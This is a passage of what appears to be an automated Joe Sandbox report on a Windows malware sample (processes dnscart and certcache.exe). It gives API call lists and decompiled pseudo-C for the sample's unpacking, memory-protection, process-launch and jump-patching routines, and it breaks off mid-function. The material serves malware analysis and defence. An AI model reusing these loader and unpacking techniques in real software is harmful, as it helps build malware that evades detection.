0x0022a7c5
0x0022a7c7
0x0022a7cc
0x0022a7dc
0x0022a7dc
0x0022a7e6
0x0022a7e8
0x0022a7ef

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 0022A7B8
CloseHandle.KERNEL32(?), ref: 0022A7CC
GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,00228F95), ref: 0022A7D5
HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 0022A7DC

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 0022961E, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 19

APIs

_snprintf.NTDLL ref: 00229642
GetProcessHeap.KERNEL32(00000000,00000010), ref: 0022964E
HeapFree.KERNEL32(00000000), ref: 00229655

Strings

216554_6C0D37D2, xrefs: 0022963D

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 002298EC, Relevance: 6.0, APIs: 4, Instructions: 18

APIs

OpenServiceW.ADVAPI32(?,?,00000001), ref: 0022989D
QueryServiceConfig2W.ADVAPI32 ref: 002298EC
GetProcessHeap.KERNEL32(00000000), ref: 002298FB
HeapFree.KERNEL32(00000000), ref: 00229902
CloseServiceHandle.ADVAPI32 ref: 00229909

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 0022891E, Relevance: 5.0, APIs: 4, Instructions: 23

C-Code - Quality: 73%

			E0022891E(unsigned char* __eax, long __ebx, void* __edi, void* __esi) {
				long _t10;
				long _t12;
				void* _t14;
				void* _t17;

				L0:
				while(1) {
					L0:
					_t14 = __edi;
					_t12 = __ebx;
					 *__eax =  *__eax >> 1;
					 *__eax =  *__eax;
					VirtualFree( *(__esi + 8), 0, ??);
					CloseHandle( *(__esi + 0x10));
					 *__edi =  *__esi;
					_t10 = HeapFree(GetProcessHeap(), 0, __esi);
					while(1) {
						L4:
						_t17 =  *_t14;
						if(_t17 == 0) {
							break;
						}
						L1:
						_t10 = WaitForSingleObject( *(_t17 + 0x10), _t12);
						if(_t10 == 0x102) {
							L3:
							_t14 = _t17;
						} else {
							L2:
							goto 0x231734;
							asm("int3");
							asm("int3");
							_push( *((intOrPtr*)(_t17 + 8)));
							goto L0;
						}
					}
					L5:
					return _t10;
					L6:
				}
			}

0x0022891e
0x0022891e
0x0022891e
0x0022891e
0x0022891e
0x00228920
0x00228923
0x0022892b
0x00228934
0x0022893f
0x00228948
0x00228952
0x00228952
0x00228952
0x00228956
0x00000000
0x00000000
0x00228904
0x00228908
0x00228913
0x00228950
0x00228950
0x00228915
0x00228915
0x00228915
0x0022891a
0x0022891b
0x0022891c
0x00000000
0x0022891c
0x00228913
0x00228958
0x0022895b
0x00000000
0x0022895b

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 00228908
VirtualFree.KERNEL32(?,00000000), ref: 0022892B
CloseHandle.KERNEL32(?), ref: 00228934
GetProcessHeap.KERNEL32(00000000), ref: 00228941
HeapFree.KERNEL32(00000000), ref: 00228948

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 00228B2C, Relevance: 5.0, APIs: 4, Instructions: 22

C-Code - Quality: 73%

			E00228B2C(unsigned char* __eax, void* __ebx, void* __edi, void* __esi) {
				long _t10;
				void* _t13;
				void* _t16;

				L0:
				while(1) {
					L0:
					_t13 = __edi;
					 *__eax =  *__eax >> 1;
					 *__eax =  *__eax;
					VirtualFree( *(__esi + 8), 0, ??);
					CloseHandle( *(__esi + 0x10));
					 *__edi =  *__esi;
					_t10 = HeapFree(GetProcessHeap(), 0, __esi);
					while(1) {
						L4:
						_t16 =  *_t13;
						if(_t16 == 0) {
							break;
						}
						L1:
						_t10 = WaitForSingleObject( *(_t16 + 0x10), 0xffffffff);
						if(_t10 == 0x102) {
							L3:
							_t13 = _t16;
						} else {
							L2:
							goto 0x2317f6;
							asm("int3");
							asm("int3");
							_push( *((intOrPtr*)(_t16 + 8)));
							goto L0;
						}
					}
					L5:
					return _t10;
					L6:
				}
			}

0x00228b2c
0x00228b2c
0x00228b2c
0x00228b2c
0x00228b2e
0x00228b31
0x00228b39
0x00228b42
0x00228b4d
0x00228b56
0x00228b60
0x00228b60
0x00228b60
0x00228b64
0x00000000
0x00000000
0x00228b11
0x00228b16
0x00228b21
0x00228b5e
0x00228b5e
0x00228b23
0x00228b23
0x00228b23
0x00228b28
0x00228b29
0x00228b2a
0x00000000
0x00228b2a
0x00228b21
0x00228b66
0x00228b68
0x00000000
0x00228b68

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00228B16
VirtualFree.KERNEL32(?,00000000), ref: 00228B39
CloseHandle.KERNEL32(?), ref: 00228B42
GetProcessHeap.KERNEL32(00000000), ref: 00228B4F
HeapFree.KERNEL32(00000000), ref: 00228B56

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Analysis Process: certcache.exe PID: 2072 Parent PID: 448

Execution Graph

Execution Coverage:	4.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0.4%
Total number of Nodes:	460
Total number of Limit Nodes:	1

Executed Functions

Function 001A16D3, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 38
process

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E001A16D3() {
				void* __edi;
				void* __esi;
				int _t12;
				void* _t13;

				memset();
				 *(_t13 - 0x58) = 0x44;
				 *((intOrPtr*)(_t13 - 0x2c)) = 0x80;
				_t12 = CreateProcessW(_t13 - 0x360, 0, 0, 0, 0, 0, 0, 0, _t13 - 0x58, _t13 - 0x14); // executed
				if(_t12 == 0) {
					goto 0x1b0044;
					asm("int3");
					asm("int3");
					return _t12;
				} else {
					WaitForSingleObject(__esi, 0xffffffff);
					CloseHandle( *(__ebp - 0x14));
					CloseHandle( *(__ebp - 0x10));
					CloseHandle(__esi);
					CloseHandle(__edi);
					_pop(__edi);
					_pop(__esi);
					_pop(__ebp);
					return 1;
				}
			}

0x001a16d3
0x001a16dc
0x001a16e6
0x001a1707
0x001a170f
0x001a1691
0x001a1696
0x001a1697
0x001a1698
0x001a1711
0x001a1714
0x001a171d
0x001a1726
0x001a172d
0x001a1734
0x001a173a
0x001a1740
0x001a1743
0x001a1744
0x001a1744

APIs

memset.NTDLL ref: 001A16D3
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 001A1707
WaitForSingleObject.KERNEL32(?,000000FF), ref: 001A1714
CloseHandle.KERNEL32(?), ref: 001A171D
CloseHandle.KERNEL32(?), ref: 001A1726
CloseHandle.KERNEL32 ref: 001A172D
CloseHandle.KERNEL32 ref: 001A1734

Strings

D, xrefs: 001A16DC

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001A1670, Relevance: 9.0, APIs: 6, Instructions: 33

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E001A1670(signed int __eax, void* __ebx, void* __esi) {
				signed int _t38;

				_t38 = __eax %  *(__esi + __ebx - 0x17);
			}

0x001a1670

APIs

CreateMutexW.KERNELBASE(?), ref: 001A167E
CloseHandle.KERNEL32 ref: 001A168B
GetLastError.KERNEL32 ref: 001A1699
SetEvent.KERNEL32 ref: 001A16A7
CloseHandle.KERNEL32 ref: 001A16AE
CloseHandle.KERNEL32(00000000), ref: 001A16B5

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 0019201B, Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 18
string

Control-flow Graph

Executed
Not Executed

APIs

lstrcmp.KERNEL32(face,book), ref: 0019203A

Strings

face, xrefs: 00192032
just string, xrefs: 00192020
book, xrefs: 0019202D

Memory Dump Source

Source File: 00000003.00000002.232736151.0000000000190000.00000040.sdmp, Offset: 00190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_certcache.jbxd

Function 001A9F9D, Relevance: 6.0, APIs: 4, Instructions: 10

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E001A9F9D() {
				void* _t5;
				void* _t6;
				void* _t7;

				memset();
				HeapFree(GetProcessHeap(), 0, _t7); // executed
				L001A15B0(_t5, _t6); // executed
				ExitProcess(0);
			}

0x001a9f9d
0x001a9fb0
0x001a9fb6
0x001a9fbd

APIs

memset.NTDLL ref: 001A9F9D
GetProcessHeap.KERNEL32(00000000), ref: 001A9FA9
HeapFree.KERNEL32(00000000), ref: 001A9FB0
ExitProcess.KERNEL32 ref: 001A9FBD

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 00192663, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 52%

			E00192663(intOrPtr _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				long _v44;
				char _v76;
				intOrPtr _v80;
				DWORD* _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr* _v96;
				void* _v100;
				intOrPtr _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr* _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				signed int _v164;
				signed int _v168;
				intOrPtr _v172;
				int _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr _t100;
				intOrPtr _t107;
				intOrPtr _t108;
				int _t113;
				int _t131;
				void* _t135;
				intOrPtr _t157;
				intOrPtr _t159;
				char* _t160;
				intOrPtr _t161;
				void* _t164;
				intOrPtr _t183;
				unsigned int _t186;
				intOrPtr _t192;
				void* _t206;
				intOrPtr _t210;

				_t100 = _a4;
				_v44 = 0;
				_t135 =  *((intOrPtr*)(_t100 + 0x3c));
				_v184 = _t135;
				_v180 = _t100;
				_v80 = _t100;
				_v84 =  &_v44;
				_v88 =  *((intOrPtr*)(_t100 + 0x20));
				_v92 =  *((intOrPtr*)(_t100 + 0x40));
				_v96 = _t100 + 0x3c;
				_v100 = _t135;
				E001923F0(); // executed
				E0019188A(_v100);
				_t210 = _t206 - 8 + 8 - 4 + 4;
				_t164 = _v100;
				_t192 =  *((intOrPtr*)(_t164 + 0x3c));
				_v104 = _t164 + _t192;
				_v108 = _v100 + 0x3c;
				_v112 = 0x18;
				if(_t192 + 0xffffffc0 <= 0xfc0) {
					_t161 = _v104;
					_t134 =  ==  ? _t161 + 0x18 : 0x18;
					_v112 =  ==  ? _t161 + 0x18 : 0x18;
				}
				_v116 = _v112;
				if(_v92 == 0) {
					L4:
					_v140 =  *_v96;
					_v144 = 0;
					do {
						_t107 = _v144;
						 *((char*)(_v140 + _t107)) =  *((intOrPtr*)(_v100 + _t107));
						_t108 = _t107 + 1;
						_v144 = _t108;
					} while (_t108 != 0x400);
					_t110 =  ==  ? _v100 +  *_v108 : 0;
					 *((intOrPtr*)(( ==  ? _v100 +  *_v108 : 0) + 0x34)) =  *_v96;
					_t113 = VirtualProtect(_v100, 0x400, 2,  &_v44); // executed
					_t183 = _v80;
					_v40 =  *((intOrPtr*)(_t183 + 0x6c));
					_v36 =  *((intOrPtr*)(_t183 + 0x70));
					_v32 =  *((intOrPtr*)(_t183 + 0x74));
					_v28 =  *((intOrPtr*)(_t183 + 0x68));
					_v24 =  *((intOrPtr*)(_t183 + 0x64));
					_v20 = _v100 +  *((intOrPtr*)(_t183 + 0x44));
					 *((intOrPtr*)(_t210 - 0xc)) = _t183;
					_v184 = 0;
					_v180 = 0x78;
					_v148 = _t113;
					_v152 = 0;
					_v156 = 0x78;
					E0019104C();
					_t210 =  *((intOrPtr*)( &_v40 + 0x10));
					goto __eax;
				} else {
					_t160 =  &_v76;
					_t203 =  ==  ? _v104 : 0;
					_v120 = ( *(( ==  ? _v104 : 0) + 0x14) & 0x0000ffff) + _v116;
					_v124 = _t160;
					_v128 = _t160 + 0x10;
					_v132 = _t160;
					_v136 = 0;
					while(1) {
						_t157 = _v120;
						_t186 =  *(_t157 + 0x24);
						_v160 = _v136;
						_v164 = _t186 >> 0x0000001e & 0x00000001;
						_v168 = _t186 >> 0x1f;
						 *_v124 = 1;
						asm("movaps xmm0, [0x1940e0]");
						asm("movups [eax], xmm0");
						_v172 = _t157;
						_t131 = VirtualProtect(_v100 +  *((intOrPtr*)(_t157 + 0xc)),  *(_t157 + 8),  *( &_v76 + (_v164 << 4) + (_v168 << 3) + ((_t186 >> 0x0000001d & 0x00000001) << 2)),  &_v44); // executed
						_t159 = _v160 + 1;
						_v176 = _t131;
						_v120 = _v172 + 0x28;
						_v136 = _t159;
						if(_t159 == _v92) {
							goto L4;
						}
					}
					goto L4;
				}
			}

0x0019266f
0x00192675
0x00192687
0x0019268d
0x00192690
0x00192694
0x00192697
0x0019269a
0x0019269d
0x001926a0
0x001926a3
0x001926a6
0x001926b7
0x001926bc
0x001926ca
0x001926cd
0x001926db
0x001926de
0x001926e1
0x001926e4
0x001926eb
0x001926f9
0x001926fc
0x001926fc
0x00192708
0x0019270b
0x00192749
0x00192750
0x00192756
0x0019275c
0x0019275c
0x0019276e
0x00192771
0x00192779
0x00192779
0x0019279c
0x0019279f
0x001927b1
0x001927bd
0x001927c6
0x001927cc
0x001927d2
0x001927d8
0x001927de
0x001927e1
0x001927e7
0x001927ea
0x001927f2
0x001927fa
0x00192800
0x00192806
0x0019280c
0x00192822
0x00192828
0x0019270d
0x0019270f
0x0019271f
0x00192732
0x00192735
0x00192738
0x0019273b
0x0019273e
0x00192835
0x0019283b
0x0019284c
0x0019284f
0x0019285d
0x0019286e
0x00192877
0x0019287d
0x00192887
0x001928b0
0x001928b6
0x001928be
0x001928cf
0x001928d5
0x001928d8
0x001928de
0x00000000
0x00000000
0x001928e4
0x00000000
0x00192835

APIs

Part of subcall function 001923F0: VirtualAlloc.KERNELBASE(00000000,00010000,00001000,00000040), ref: 00192428

VirtualProtect.KERNELBASE(?,00000400,00000002,00000000), ref: 001927B1
VirtualProtect.KERNELBASE(?,?,?,00000000), ref: 001928B6

Strings

x, xrefs: 001927F2

Memory Dump Source

Source File: 00000003.00000002.232736151.0000000000190000.00000040.sdmp, Offset: 00190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_certcache.jbxd

Function 001A9F42, Relevance: 4.5, APIs: 3, Instructions: 25

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 47%

			E001A9F42() {
				void* _t6;
				void* _t11;
				void* _t12;
				void* _t18;
				void* _t19;
				void* _t20;

				L001A1B10(E001A1BE0(_t11, _t12, _t18, _t19), 0x1a11f0, _t18, _t19);
				_push(0x1ac0d0);
				_push(0x64df2dad);
				_push(0x48);
				_t15 = E001A1BE0(_t11, 0x8f7ee672, _t18, _t19);
				L001A1B10(_t3, 0x1a10d0, _t18, _t19);
				_t6 = RtlAllocateHeap(GetProcessHeap(), 0, 0x8000000); // executed
				_t20 = _t6;
				if(_t20 == 0) {
					L3:
					ExitProcess(0);
				}
				goto 0x1b1d52;
				asm("int3");
				asm("int3");
				asm("int3");
				memset();
				HeapFree(GetProcessHeap(), 0, _t20); // executed
				L001A15B0(_t11, _t15); // executed
				goto L3;
			}

0x001a9f4e
0x001a9f5b
0x001a9f60
0x001a9f65
0x001a9f71
0x001a9f73
0x001a9f89
0x001a9f8f
0x001a9f93
0x001a9fbb
0x001a9fbd
0x001a9fbd
0x001a9f95
0x001a9f9a
0x001a9f9b
0x001a9f9c
0x001a9f9d
0x001a9fb0
0x001a9fb6
0x00000000

APIs

GetProcessHeap.KERNEL32(00000000,08000000), ref: 001A9F82
RtlAllocateHeap.NTDLL(00000000), ref: 001A9F89
ExitProcess.KERNEL32 ref: 001A9FBD

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001923F0, Relevance: 1.4, APIs: 1, Instructions: 200

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 30%

			E001923F0(intOrPtr _a4, void* _a8) {
				char _v21;
				char _v26;
				char _v31;
				intOrPtr* _v36;
				intOrPtr _v40;
				intOrPtr* _v44;
				intOrPtr* _v48;
				void** _v52;
				char* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr* _v72;
				intOrPtr* _v76;
				intOrPtr* _v80;
				void** _v84;
				char* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char* _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				void* _t121;
				intOrPtr _t143;
				intOrPtr _t148;
				intOrPtr _t157;
				intOrPtr _t158;
				void* _t162;
				intOrPtr _t164;
				intOrPtr _t167;
				char* _t168;
				void** _t173;
				void* _t178;
				intOrPtr _t191;
				intOrPtr _t197;
				intOrPtr _t214;
				intOrPtr _t217;
				intOrPtr* _t223;
				void** _t232;
				char* _t234;
				void* _t243;
				intOrPtr* _t244;

				_v36 =  &_v21;
				_v40 = _a4;
				_v44 =  &_v31;
				_v48 =  &_v26;
				_t121 = VirtualAlloc(0, 0x10000, 0x1000, 0x40); // executed
				_t234 =  &_v21;
				_t168 =  &_v26;
				_v52 = _t121;
				_v56 =  &_v31;
				 *_v52 = 0;
				_v60 =  *((intOrPtr*)(_v40 + 0x3c));
				_v64 = 4;
				_v68 = _v40 + _v60;
				_t130 =  ==  ? _v68 : 0;
				_v72 = _v56 + 1;
				_v76 = _t168 + 1;
				_v80 = _t234 + 1;
				_v84 =  &(_v52[1]);
				_v88 = _t168;
				_v92 = _v40 -  *((intOrPtr*)(( ==  ? _v68 : 0) + 0x34));
				_v96 = _v64;
				_v100 = _t234;
				_v104 = 0xfffffffb - _v52;
				_v108 = 0;
				while(1) {
					_t191 = _v96;
					_v112 = _v108;
					_v116 = _t191;
					_t143 = _t191 + _v52;
					 *_v56 = 0xe8;
					 *_v72 = 0x192194 - _t143;
					_t173 = _v52;
					_v120 = _t143;
					 *((intOrPtr*)(_t173 + _v116)) =  *_v44;
					_t197 = _v116;
					 *((char*)(_t173 + _t197 + 4)) =  *((intOrPtr*)(_v44 + 4));
					_t148 =  *((intOrPtr*)(0x19305c + _v112 * 0xc + 4));
					_v124 = _t148;
					_t178 = _t148 + _v40;
					 *_v88 = 0xe9;
					_v128 = _v120 + 0xfffffffb - _t178;
					_v132 = _t197 + 5;
					 *_v76 = _v128;
					 *_v100 = 0xe9;
					 *_v80 = _v104 + 0xfffffffb - _v116 + _t178;
					_v136 =  *((intOrPtr*)(0x19305c + _v112 * 0xc + 8));
					_v140 =  *((intOrPtr*)(0x19305c + _v112 * 0xc));
					_v144 = _v52 + _v132;
					_v148 = 0;
					do {
						_t157 = _v148;
						 *((char*)(_v144 + _t157)) =  *((intOrPtr*)(_v140 + _t157));
						_t158 = _t157 + 1;
						_v148 = _t158;
					} while (_t158 != _v136);
					_t244 = _t243 - 0x14;
					 *_t244 = _v40;
					_v164 = _v92;
					_v160 = _v124;
					_v156 = _v136;
					_v152 = _v144;
					E001921AC();
					_t243 = _t244 + 0x14;
					_t162 = _v116 + _v136;
					_t223 = _v36;
					_t232 = _v84;
					 *((intOrPtr*)(_t232 + _t162)) =  *_t223;
					 *((char*)(_t232 + _t162 + 4)) =  *((intOrPtr*)(_t223 + 4));
					_t164 = _v40;
					_t214 = _v124;
					 *((intOrPtr*)(_t164 + _t214)) =  *_v48;
					 *((char*)(_t164 + _t214 + 4)) =  *((intOrPtr*)(_v48 + 4));
					_t167 = _v116 + 0xe + _v136;
					_t217 = _v112 + 1;
					_v96 = _t167;
					_v108 = _t217;
					if(_t217 != 0x160) {
						continue;
					}
					return _t167;
				}
			}

0x0019241c
0x0019241f
0x00192422
0x00192425
0x00192428
0x00192431
0x00192439
0x0019243c
0x00192442
0x00192448
0x00192454
0x0019245a
0x00192465
0x00192477
0x00192486
0x0019248e
0x0019249b
0x001924a4
0x001924aa
0x001924ad
0x001924b0
0x001924b3
0x001924b6
0x001924b9
0x001924c9
0x001924cc
0x001924e5
0x001924ea
0x001924f0
0x001924f5
0x001924fd
0x00192504
0x00192507
0x0019250d
0x00192516
0x00192519
0x0019252d
0x00192531
0x00192537
0x0019253c
0x00192547
0x0019254d
0x00192553
0x00192567
0x00192579
0x0019258d
0x00192593
0x00192599
0x0019259f
0x001925a5
0x001925a5
0x001925ba
0x001925bd
0x001925c8
0x001925c8
0x001925d0
0x001925d6
0x001925dc
0x001925e3
0x001925ed
0x001925f7
0x001925fb
0x00192600
0x0019260c
0x0019260e
0x00192613
0x00192616
0x0019261c
0x00192625
0x00192628
0x0019262b
0x00192634
0x00192644
0x00192649
0x00192652
0x00192655
0x00192658
0x00000000
0x0019265e
0x001924c8
0x001924c8

APIs

VirtualAlloc.KERNELBASE(00000000,00010000,00001000,00000040), ref: 00192428

Memory Dump Source

Source File: 00000003.00000002.232736151.0000000000190000.00000040.sdmp, Offset: 00190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_certcache.jbxd

Function 00191C91, Relevance: 1.3, APIs: 1, Instructions: 76

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00191CD7

Memory Dump Source

Source File: 00000003.00000002.232736151.0000000000190000.00000040.sdmp, Offset: 00190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_certcache.jbxd

Non-executed Functions

Function 001A2E6A, Relevance: 1.8, Strings: 1, Instructions: 509
Crypto

C-Code - Quality: 50%

			E001A2E6A(void* __ebx, void* __fp0) {
				signed int _t1688;
				signed int _t1692;
				void* _t2075;
				signed int _t2086;
				signed int _t2465;
				void* _t2870;

				_t2075 = __ebx;
				 *(_t2870 - 0x1c) = 0xffffffff;
				 *(_t2870 - 4) =  *(_t2870 + 0xc);
				 *((intOrPtr*)(_t2870 - 0x18)) =  *(_t2870 + 0xc) +  *( *(_t2870 + 0x10));
				 *(_t2870 - 0x14) =  *(_t2870 + 0x18);
				 *((intOrPtr*)(_t2870 - 0x70)) =  *(_t2870 + 0x18) +  *( *(_t2870 + 0x1c));
				if(( *(_t2870 + 0x20) & 0x00000004) == 0) {
					 *(_t2870 - 0xf0) =  *(_t2870 + 0x18) -  *((intOrPtr*)(_t2870 + 0x14)) +  *( *(_t2870 + 0x1c)) - 1;
				} else {
					 *(_t2870 - 0xf0) = 0xffffffff;
				}
				 *(_t2870 - 0x88) =  *(_t2870 - 0xf0);
				if(( *(_t2870 - 0x88) + 0x00000001 &  *(_t2870 - 0x88)) != 0 ||  *(_t2870 + 0x18) <  *((intOrPtr*)(_t2870 + 0x14))) {
					 *( *(_t2870 + 0x1c)) = 0;
					 *( *(_t2870 + 0x10)) = 0;
					_t1688 = 0xfffffffd;
				} else {
					 *(_t2870 - 8) =  *( *(_t2870 + 8) + 4);
					 *(_t2870 - 0xc) =  *( *(_t2870 + 8) + 0x38);
					 *(_t2870 - 0x28) =  *( *(_t2870 + 8) + 0x20);
					 *(_t2870 - 0x10) =  *( *(_t2870 + 8) + 0x24);
					 *(_t2870 - 0x24) =  *( *(_t2870 + 8) + 0x28);
					_t1692 =  *( *(_t2870 + 8) + 0x3c);
					 *(_t2870 - 0x7c) = _t1692;
					_t2086 =  *(_t2870 + 8);
					_t2465 =  *_t2086;
					 *(_t2870 - 0xf8) = _t2465;
					if( *(_t2870 - 0xf8) <= 0x35) {
						_t50 =  *(_t2870 - 0xf8) + 0x1a55b0; // 0xcccccc20
						switch( *((intOrPtr*)(( *_t50 & 0x000000ff) * 4 +  &M001A5528))) {
							case 0:
								 *( *(_t2870 + 8) + 0xc) = 0;
								 *( *(_t2870 + 8) + 8) = 0;
								 *(_t2870 - 0x24) = 0;
								 *(_t2870 - 0x10) =  *(_t2870 - 0x24);
								 *(_t2870 - 0x28) =  *(_t2870 - 0x10);
								 *(_t2870 - 8) =  *(_t2870 - 0x28);
								 *(_t2870 - 0xc) =  *(_t2870 - 8);
								 *( *(_t2870 + 8) + 0x1c) = 1;
								 *( *(_t2870 + 8) + 0x10) = 1;
								if(( *(_t2870 + 0x20) & 0x00000001) == 0) {
									goto L48;
								} else {
									goto L9;
								}
								goto L600;
							case 1:
								if(0 != 0) {
									L11:
									 *(_t2870 - 0x1c) = 1;
									_t2086 =  *(_t2870 + 8);
									 *_t2086 = 1;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L10;
									} else {
										 *( *((intOrPtr*)(__ebp + 8)) + 8) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										L18:
										L20:
										if(0 != 0) {
											L9:
											_t2465 =  *(_t2870 - 4);
											if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
												 *( *(_t2870 + 8) + 8) =  *( *(_t2870 - 4)) & 0x000000ff;
												 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
												goto L20;
											} else {
												L10:
												_t1692 =  *(_t2870 + 0x20) & 0x00000002;
												if(_t1692 == 0) {
													 *( *(_t2870 + 8) + 8) = 0;
													goto L18;
												} else {
													goto L11;
												}
											}
										} else {
											goto L21;
										}
									}
								}
								goto L600;
							case 2:
								if(0 != 0) {
									L23:
									 *(_t2870 - 0x1c) = 1;
									_t2086 =  *(_t2870 + 8);
									 *_t2086 = 2;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L22;
									} else {
										 *( *((intOrPtr*)(__ebp + 8)) + 0xc) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										L30:
										L32:
										if(0 != 0) {
											L21:
											_t2465 =  *(_t2870 - 4);
											if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
												 *( *(_t2870 + 8) + 0xc) =  *( *(_t2870 - 4)) & 0x000000ff;
												 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
												goto L32;
											} else {
												L22:
												_t1692 =  *(_t2870 + 0x20) & 0x00000002;
												if(_t1692 == 0) {
													 *( *(_t2870 + 8) + 0xc) = 0;
													goto L30;
												} else {
													goto L23;
												}
											}
										} else {
